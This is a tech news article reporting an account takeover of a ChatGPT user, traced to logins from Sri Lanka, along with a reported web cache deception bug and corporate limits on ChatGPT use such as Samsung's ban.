ChatGPT
OpenAI addresses ChatGPT account security breach
Glitching chat histories on ChatGPT was actually something far worse.
Just a heads up, if you buy something through our links, we may get a small share of the sale. It’s one of the ways we keep the lights on here. Click here for more.
OpenAI has confirmed an incident involving unauthorized access to a ChatGPT user’s account, shedding light on potential vulnerabilities within its security framework.
According to reports, the breach, initially thought to be an internal glitch revealing chat histories to unrelated users, was actually the result of a targeted account takeover.
This incident and the recent AI-powered deepfakes of Taylor Swift have sparked a broader conversation about the security measures in place for AI-powered platforms and the need for enhanced user protection protocols.
Here’s what happened in ChatGPT
The breach came to light when a user from Brooklyn, New York, noticed unfamiliar chat histories appearing in his ChatGPT account.
OpenAI’s investigation revealed that these unauthorized accesses originated from Sri Lanka, suggesting a deliberate attempt to compromise the account.
“From what we discovered, we consider it an account take over in that it’s consistent with activity we see where someone is contributing to a ‘pool’ of identities that an external community or proxy server uses to distribute free access,” a OpenAI spokesperson wrote to ArsTechnica. “The investigation observed that conversations were created recently from Sri Lanka. These conversations are in the same time frame as successful logins from Sri Lanka.”
Despite the user’s confidence in the strength of his password, the incident underscores the sophistication of methods used by attackers to gain unauthorized access.
Technical vulnerabilities exposed
Further examination revealed that the ChatGPT platform had several severe vulnerabilities that could be exploited to take over accounts and view sensitive chat histories.
Among these was a critical web cache deception bug that allowed attackers to harvest user credentials, including names, emails, and access tokens.
This discovery points to a pressing need for OpenAI to reinforce its security measures and address potential loopholes that could be exploited by cybercriminals.
Privacy concerns and industry response
Now, keep in mind. This isn’t the first time this has happened.
Privacy concerns were great enough for OpenAI to add an incognito mode to ChatGPT last year. This limits how many conversations are retained, but it still has a rolling 30-day history.
In response to growing concerns, companies, including prominent tech giants, have begun to limit or restrict their employees’ use of ChatGPT and similar platforms, aiming to mitigate the risk of proprietary or sensitive data leakage.
One notable name is Samsung, which banned generative AI tools like ChatGPT in May 2023, after noticing internal source code being returned by queries on ChatGPT’s chatbot.
OpenAI’s Response
The tech community has responded with a mixture of concern and calls for increased vigilance in the use of AI services, emphasizing the importance of removing personal details from interactions wherever possible.
OpenAI has acknowledged the incident and is reportedly taking steps to investigate and fortify its security protocols to prevent similar breaches in the future.
Yup, we’ve heard that before, but let’s hope they mean it this time.
Have any thoughts on this? Drop us a line below in the comments, or carry the discussion to our Twitter or Facebook.
Editors’ Recommendations:
- First Galaxy Z Fold 6 leak shows a massive shift in screen aspect ratio
- Lovense app comes out for Apple Vision Pro
- Leak reveals Galaxy Z Flip 6 will get a larger 4,000 mAh battery
- 80% of airline apps are reportedly spying on you